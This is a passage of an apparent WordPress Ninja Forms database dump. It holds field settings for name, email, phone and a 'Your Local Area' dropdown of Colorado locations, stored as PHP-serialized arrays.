Name'),(2056,67,'label_pos','above','label_pos','above'),(2057,67,'mask','','mask',''),(2058,67,'datepicker','0','datepicker','0'),(2059,67,'first_name','1','first_name','1'),(2060,67,'last_name','0','last_name','0'),(2061,67,'from_name','0','from_name','0'),(2062,67,'user_info_field_group','1','user_info_field_group','1'),(2063,67,'show_help','0','show_help','0'),(2064,67,'help_text','','help_text',''),(2065,67,'calc_auto_include','0','calc_auto_include','0'),(2066,67,'calc_option','0','calc_option','0'),(2067,67,'placeholder','','placeholder',''),(2068,67,'user_address_1','','user_address_1',''),(2069,67,'user_address_2','','user_address_2',''),(2070,67,'user_city','','user_city',''),(2071,67,'user_zip','','user_zip',''),(2072,67,'user_phone','','user_phone',''),(2073,67,'user_email','','user_email',''),(2074,67,'disable_input','0','disable_input','0'),(2075,67,'input_limit','','input_limit',''),(2076,67,'input_limit_type','char','input_limit_type','char'),(2077,67,'input_limit_msg','','input_limit_msg',''),(2078,67,'user_state','0','user_state','0'),(2079,67,'autocomplete_off','0','autocomplete_off','0'),(2080,67,'num_sort','0','num_sort','0'),(2081,67,'admin_label','','admin_label',''),(2082,67,'user_info_field_group_name','','user_info_field_group_name',''),(2083,67,'user_info_field_group_custom','','user_info_field_group_custom',''),(2084,67,'show_desc','0','show_desc','0'),(2085,67,'desc_pos','none','desc_pos','none'),(2086,67,'desc_text','','desc_text',''),(2087,67,'element_class','','element_class',''),(2088,67,'required','1','required','1'),(2089,67,'key','textbox_21','key','textbox_21'),(2090,67,'default','','default',''),(2091,67,'container_class','one-half first','container_class','one-half first'),(2092,67,'manual_key','','manual_key',''),(2093,67,'custom_mask','','custom_mask',''),(2094,67,'parent_id','8','parent_id','8'),(2095,68,'objectType','Field','objectType','Field'),(2096,68,'objectDomain','fields','objectDomain','fields'),(2097,68,'editActive','','editActive',''),(2098,68,'order','3','order','3'),(2099,68,'type','lastname','type','lastname'),(2100,68,'def_id','7','def_id','7'),(2101,68,'label','Last Name','label','Last Name'),(2102,68,'label_pos','above','label_pos','above'),(2103,68,'mask','','mask',''),(2104,68,'datepicker','0','datepicker','0'),(2105,68,'first_name','0','first_name','0'),(2106,68,'from_name','0','from_name','0'),(2107,68,'user_info_field_group','1','user_info_field_group','1'),(2108,68,'show_help','0','show_help','0'),(2109,68,'help_text','','help_text',''),(2110,68,'calc_auto_include','0','calc_auto_include','0'),(2111,68,'calc_option','0','calc_option','0'),(2112,68,'placeholder','','placeholder',''),(2113,68,'user_address_1','','user_address_1',''),(2114,68,'user_address_2','','user_address_2',''),(2115,68,'user_city','','user_city',''),(2116,68,'user_zip','','user_zip',''),(2117,68,'user_phone','','user_phone',''),(2118,68,'user_email','','user_email',''),(2119,68,'disable_input','0','disable_input','0'),(2120,68,'input_limit','','input_limit',''),(2121,68,'input_limit_type','char','input_limit_type','char'),(2122,68,'input_limit_msg','','input_limit_msg',''),(2123,68,'user_state','0','user_state','0'),(2124,68,'autocomplete_off','0','autocomplete_off','0'),(2125,68,'num_sort','0','num_sort','0'),(2126,68,'admin_label','','admin_label',''),(2127,68,'user_info_field_group_name','','user_info_field_group_name',''),(2128,68,'user_info_field_group_custom','','user_info_field_group_custom',''),(2129,68,'show_desc','0','show_desc','0'),(2130,68,'desc_pos','none','desc_pos','none'),(2131,68,'desc_text','','desc_text',''),(2132,68,'element_class','','element_class',''),(2133,68,'required','1','required','1'),(2134,68,'key','lastname_22','key','lastname_22'),(2135,68,'default','','default',''),(2136,68,'container_class','one-half','container_class','one-half'),(2137,68,'parent_id','8','parent_id','8'),(2138,69,'objectType','Field','objectType','Field'),(2139,69,'objectDomain','fields','objectDomain','fields'),(2140,69,'editActive','','editActive',''),(2141,69,'order','4','order','4'),(2142,69,'type','email','type','email'),(2143,69,'def_id','14','def_id','14'),(2144,69,'label','Email','label','Email'),(2145,69,'label_pos','above','label_pos','above'),(2146,69,'mask','','mask',''),(2147,69,'datepicker','0','datepicker','0'),(2148,69,'first_name','0','first_name','0'),(2149,69,'last_name','0','last_name','0'),(2150,69,'from_name','0','from_name','0'),(2151,69,'user_address_1','0','user_address_1','0'),(2152,69,'user_address_2','0','user_address_2','0'),(2153,69,'user_city','0','user_city','0'),(2154,69,'user_zip','0','user_zip','0'),(2155,69,'user_phone','0','user_phone','0'),(2156,69,'user_info_field_group','1','user_info_field_group','1'),(2157,69,'show_help','0','show_help','0'),(2158,69,'help_text','','help_text',''),(2159,69,'calc_auto_include','0','calc_auto_include','0'),(2160,69,'calc_option','0','calc_option','0'),(2161,69,'placeholder','','placeholder',''),(2162,69,'disable_input','0','disable_input','0'),(2163,69,'input_limit','','input_limit',''),(2164,69,'input_limit_type','char','input_limit_type','char'),(2165,69,'input_limit_msg','','input_limit_msg',''),(2166,69,'user_state','0','user_state','0'),(2167,69,'autocomplete_off','0','autocomplete_off','0'),(2168,69,'num_sort','0','num_sort','0'),(2169,69,'admin_label','','admin_label',''),(2170,69,'user_info_field_group_name','','user_info_field_group_name',''),(2171,69,'user_info_field_group_custom','','user_info_field_group_custom',''),(2172,69,'show_desc','0','show_desc','0'),(2173,69,'desc_pos','none','desc_pos','none'),(2174,69,'desc_text','','desc_text',''),(2175,69,'element_class','','element_class',''),(2176,69,'required','1','required','1'),(2177,69,'key','email_23','key','email_23'),(2178,69,'default','','default',''),(2179,69,'container_class','one-half first','container_class','one-half first'),(2180,69,'parent_id','8','parent_id','8'),(2181,70,'objectType','Field','objectType','Field'),(2182,70,'objectDomain','fields','objectDomain','fields'),(2183,70,'editActive','','editActive',''),(2184,70,'order','5','order','5'),(2185,70,'type','phone','type','phone'),(2186,70,'def_id','15','def_id','15'),(2187,70,'label','Phone','label','Phone'),(2188,70,'label_pos','above','label_pos','above'),(2189,70,'mask','(999) 999-9999','mask','(999) 999-9999'),(2190,70,'datepicker','0','datepicker','0'),(2191,70,'first_name','0','first_name','0'),(2192,70,'last_name','0','last_name','0'),(2193,70,'from_name','0','from_name','0'),(2194,70,'user_address_1','0','user_address_1','0'),(2195,70,'user_address_2','0','user_address_2','0'),(2196,70,'user_city','0','user_city','0'),(2197,70,'user_zip','0','user_zip','0'),(2198,70,'user_email','0','user_email','0'),(2199,70,'user_info_field_group','1','user_info_field_group','1'),(2200,70,'show_help','0','show_help','0'),(2201,70,'help_text','','help_text',''),(2202,70,'calc_auto_include','0','calc_auto_include','0'),(2203,70,'calc_option','0','calc_option','0'),(2204,70,'placeholder','','placeholder',''),(2205,70,'disable_input','0','disable_input','0'),(2206,70,'input_limit','','input_limit',''),(2207,70,'input_limit_type','char','input_limit_type','char'),(2208,70,'input_limit_msg','','input_limit_msg',''),(2209,70,'user_state','0','user_state','0'),(2210,70,'autocomplete_off','0','autocomplete_off','0'),(2211,70,'num_sort','0','num_sort','0'),(2212,70,'admin_label','','admin_label',''),(2213,70,'user_info_field_group_name','','user_info_field_group_name',''),(2214,70,'user_info_field_group_custom','','user_info_field_group_custom',''),(2215,70,'show_desc','0','show_desc','0'),(2216,70,'desc_pos','none','desc_pos','none'),(2217,70,'desc_text','','desc_text',''),(2218,70,'element_class','','element_class',''),(2219,70,'required','1','required','1'),(2220,70,'key','phone_24','key','phone_24'),(2221,70,'default','','default',''),(2222,70,'container_class','one-half','container_class','one-half'),(2223,70,'manual_key','','manual_key',''),(2224,70,'custom_mask','','custom_mask',''),(2225,70,'parent_id','8','parent_id','8'),(2226,71,'objectType','Field','objectType','Field'),(2227,71,'objectDomain','fields','objectDomain','fields'),(2228,71,'editActive','','editActive',''),(2229,71,'order','6','order','6'),(2230,71,'type','listselect','type','listselect'),(2231,71,'label','Your Local Area','label','Your Local Area'),(2232,71,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2233,71,'label_pos','above','label_pos','above'),(2234,71,'list_type','dropdown','list_type','dropdown'),(2235,71,'multi_size','5','multi_size','5'),(2236,71,'list_show_value','1','list_show_value','1'),(2237,71,'list','a:0:{}','list','a:0:{}'),(2238,71,'user_info_field_group','','user_info_field_group',''),(2239,71,'calc_auto_include','0','calc_auto_include','0'),(2240,71,'user_state','0','user_state','0'),(2241,71,'num_sort','0','num_sort','0'),(2242,71,'admin_label','','admin_label',''),(2243,71,'show_help','0','show_help','0'),(2244,71,'help_text','','help_text',''),(2245,71,'show_desc','0','show_desc','0'),(2246,71,'desc_pos','none','desc_pos','none'),(2247,71,'desc_text','','desc_text',''),(2248,71,'element_class','','element_class',''),(2249,71,'required','1','required','1'),(2250,71,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 